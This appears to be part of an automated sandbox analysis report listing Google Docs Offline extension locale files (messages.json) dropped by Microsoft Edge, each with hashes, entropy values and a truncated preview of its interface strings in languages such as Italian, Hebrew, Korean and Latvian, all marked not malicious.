                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):954
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.6457079159286545
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
                                                                                                                                                                                                                                                                                    MD5:CAEB37F451B5B5E9F5EB2E7E7F46E2D7
                                                                                                                                                                                                                                                                                    SHA1:F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
                                                                                                                                                                                                                                                                                    SHA-256:943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
                                                                                                                                                                                                                                                                                    SHA-512:A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\it\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):899
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.474743599345443
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
                                                                                                                                                                                                                                                                                    MD5:0D82B734EF045D5FE7AA680B6A12E711
                                                                                                                                                                                                                                                                                    SHA1:BD04F181E4EE09F02CD53161DCABCEF902423092
                                                                                                                                                                                                                                                                                    SHA-256:F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
                                                                                                                                                                                                                                                                                    SHA-512:01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\iw\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2230
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.8239097369647634
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
                                                                                                                                                                                                                                                                                    MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                                                                                                                                                                                                                                                                    SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                                                                                                                                                                                                                                                                    SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
                                                                                                                                                                                                                                                                                    SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\ja\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1160
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.292894989863142
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
                                                                                                                                                                                                                                                                                    MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
                                                                                                                                                                                                                                                                                    SHA1:4017FC6D8B302335469091B91D063B07C9E12109
                                                                                                                                                                                                                                                                                    SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
                                                                                                                                                                                                                                                                                    SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\ka\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):3264
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.586016059431306
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
                                                                                                                                                                                                                                                                                    MD5:83F81D30913DC4344573D7A58BD20D85
                                                                                                                                                                                                                                                                                    SHA1:5AD0E91EA18045232A8F9DF1627007FE506A70E0
                                                                                                                                                                                                                                                                                    SHA-256:30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
                                                                                                                                                                                                                                                                                    SHA-512:85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"\u10d0\u10ee\u10da\u10d8\u10e1 \u10e8\u10d4\u10e5\u10db\u10dc\u10d0"},"explanationofflinedisabled":{"message":"\u10d7\u10e5\u10d5\u10d4\u10dc \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10ee\u10d0\u10e0\u10d7. Google Docs-\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10dc\u10d4\u10e2\u10d7\u10d0\u10dc \u10d9\u10d0\u10d5\u10e8\u10d8\u10e0\u10d8\u10e1 \u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d2\u10d0\u10d3\u10d0\u10d3\u10d8\u10d7 \u10de\u10d0\u10e0\u10d0\u10db\u10d4\u10e2\u10e0\u10d4\u10d1\u10d6\u10d4 Google Docs-\u10d8\u10e1 \u10db\u10d7\u10d0\u10d5\u10d0\u10e0 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d6\u10d4 \u10d3\u10d0 \u10e9\u10d0\u10e0\u10d7\u10d4\u10d7 \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10e1\u10d8\u10dc\u10e5\u10e0\u10dd\u10dc\u10d8\u10d6\u10d0\u10ea\u10d8\u10d0, \u10e0\u10dd\u10d3\u10d4\u10e1\u10d0\u10ea \u10e8\u10d4\u10db\u10d3\u10d2\u10dd\u10

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\kk\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):3235
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.6081439490236464
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
                                                                                                                                                                                                                                                                                    MD5:2D94A58795F7B1E6E43C9656A147AD3C
                                                                                                                                                                                                                                                                                    SHA1:E377DB505C6924B6BFC9D73DC7C02610062F674E
                                                                                                                                                                                                                                                                                    SHA-256:548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
                                                                                                                                                                                                                                                                                    SHA-512:F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"\u0416\u0410\u04a2\u0410\u0421\u042b\u041d \u0416\u0410\u0421\u0410\u0423"},"explanationofflinedisabled":{"message":"\u0421\u0456\u0437 \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u043d\u0434\u0435\u0441\u0456\u0437. Google Docs \u049b\u043e\u043b\u0434\u0430\u043d\u0431\u0430\u0441\u044b\u043d \u0436\u0435\u043b\u0456 \u0431\u0430\u0439\u043b\u0430\u043d\u044b\u0441\u044b\u043d\u0441\u044b\u0437 \u049b\u043e\u043b\u0434\u0430\u043d\u0443 \u04af\u0448\u0456\u043d, \u043a\u0435\u043b\u0435\u0441\u0456 \u0436\u043e\u043b\u044b \u0436\u0435\u043b\u0456\u0433\u0435 \u049b\u043e\u0441\u044b\u043b\u0493\u0430\u043d\u0434\u0430, Google Docs \u043d\u0435\u0433\u0456\u0437\u0433\u0456 \u0431\u0435\u0442\u0456\u043d\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043b\u0435\u0440 \u0431\u04e9\u043b\u0456\u043c\u0456\u043d \u043a\u0456\u0440\u0456\u043f, \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\km\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):3122
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.891443295908904
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
                                                                                                                                                                                                                                                                                    MD5:B3699C20A94776A5C2F90AEF6EB0DAD9
                                                                                                                                                                                                                                                                                    SHA1:1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
                                                                                                                                                                                                                                                                                    SHA-256:A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
                                                                                                                                                                                                                                                                                    SHA-512:1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"\u1794\u1784\u17d2\u1780\u17be\u178f\u200b\u1790\u17d2\u1798\u17b8"},"explanationofflinedisabled":{"message":"\u17a2\u17d2\u1793\u1780\u200b\u1782\u17d2\u1798\u17b6\u1793\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f\u17d4 \u178a\u17be\u1798\u17d2\u1794\u17b8\u200b\u1794\u17d2\u179a\u17be Google \u17af\u1780\u179f\u17b6\u179a\u200b\u1794\u17b6\u1793\u200b\u200b\u178a\u17c4\u1799\u200b\u200b\u1798\u17b7\u1793\u1798\u17b6\u1793\u200b\u200b\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f \u179f\u17bc\u1798\u200b\u200b\u1791\u17c5\u200b\u1780\u17b6\u1793\u17cb\u200b\u1780\u17b6\u179a\u200b\u1780\u17c6\u178e\u178f\u17cb\u200b\u1793\u17c5\u200b\u179b\u17be\u200b\u1782\u17c1\u17a0\u1791\u17c6\u1796\u17d0\u179a Google \u17af\u1780\u179f\u17b6\u179a \u1793\u17b7\u1784\u200b\u1794\u17be\u1780\u200b\u1780\u17b6\u179a\u1792\u17d2\u179c\u17be\u200b\u179f\u1798\u1780\u17b6\u179b\u1780\u1798\u17d2\u1798\u200b\u200b\u200b\u1782\u17d2\u1798\u17b6\u1793

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\kn\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1895
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.28990403715536
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
                                                                                                                                                                                                                                                                                    MD5:38BE0974108FC1CC30F13D8230EE5C40
                                                                                                                                                                                                                                                                                    SHA1:ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
                                                                                                                                                                                                                                                                                    SHA-256:30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
                                                                                                                                                                                                                                                                                    SHA-512:7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "........ .....".. },.. "explanationofflinedisabled": {.. "message": ".... ..................... ......... ............. Google ...... ....., Google ...... ............ ............... .... ..... ...... .... .... ............ ............. ........ ..... ... .....".. },.. "explanationofflineenabled": {.. "message": ".... ...................., .... .... .... ......... ........... ............ .... ........ .........."..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\ko\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1042
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.3945675025513955
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
                                                                                                                                                                                                                                                                                    MD5:F3E59EEEB007144EA26306C20E04C292
                                                                                                                                                                                                                                                                                    SHA1:83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
                                                                                                                                                                                                                                                                                    SHA-256:C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
                                                                                                                                                                                                                                                                                    SHA-512:7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": ".. ...".. },.. "explanationofflinedisabled": {.. "message": ".... ...... ... .. .. Google Docs. ..... Google Docs .... .... .... .... .... ..... . .... .... ..... ......".. },.. "explanationofflineenabled": {.. "message": ".... ...... ... .. ... ... ..... ... ... .. . .....".. },.. "extdesc": {.. "message": ".... .... ... .., ...... . ....... .., .., ......".. },.. "extname": {.. "message": "Google Docs ....".. },.. "learnmore": {.. "message": "... ....".. },.. "popuphelptext": {.. "message": "... .. ... .... ..... .... .... .....

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\lo\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2535
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.8479764584971368
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
                                                                                                                                                                                                                                                                                    MD5:E20D6C27840B406555E2F5091B118FC5
                                                                                                                                                                                                                                                                                    SHA1:0DCECC1A58CEB4936E255A64A2830956BFA6EC14
                                                                                                                                                                                                                                                                                    SHA-256:89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
                                                                                                                                                                                                                                                                                    SHA-512:AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"\u0eaa\u0ec9\u0eb2\u0e87\u0ec3\u0edd\u0ec8"},"explanationofflinedisabled":{"message":"\u0e97\u0ec8\u0eb2\u0e99\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ea2\u0eb9\u0ec8. \u0ec0\u0e9e\u0eb7\u0ec8\u0ead\u0ec3\u0e8a\u0ec9 Google Docs \u0ec2\u0e94\u0e8d\u0e9a\u0ecd\u0ec8\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94, \u0ec3\u0eab\u0ec9\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e81\u0eb2\u0e99\u0e95\u0eb1\u0ec9\u0e87\u0e84\u0ec8\u0eb2\u0ec3\u0e99\u0edc\u0ec9\u0eb2 Google Docs \u0ec1\u0ea5\u0ec9\u0ea7\u0ec0\u0e9b\u0eb5\u0e94\u0ec3\u0e8a\u0ec9\u0e81\u0eb2\u0e99\u0e8a\u0eb4\u0ec9\u0e87\u0ec1\u0e9a\u0e9a\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ec3\u0e99\u0ec0\u0e97\u0eb7\u0ec8\u0ead\u0e95\u0ecd\u0ec8\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e97\u0ec8\u0eb2\u0e99\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94."},"explanationofflineenabled":{"message":"\u0e97\u0ec

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\lt\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1028
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.797571191712988
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
                                                                                                                                                                                                                                                                                    MD5:970544AB4622701FFDF66DC556847652
                                                                                                                                                                                                                                                                                    SHA1:14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
                                                                                                                                                                                                                                                                                    SHA-256:5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
                                                                                                                                                                                                                                                                                    SHA-512:CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\lv\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):994
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.700308832360794
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
                                                                                                                                                                                                                                                                                    MD5:A568A58817375590007D1B8ABCAEBF82
                                                                                                                                                                                                                                                                                    SHA1:B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
                                                                                                                                                                                                                                                                                    SHA-256:0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
                                                                                                                                                                                                                                                                                    SHA-512:FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\ml\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2091
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.358252286391144
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
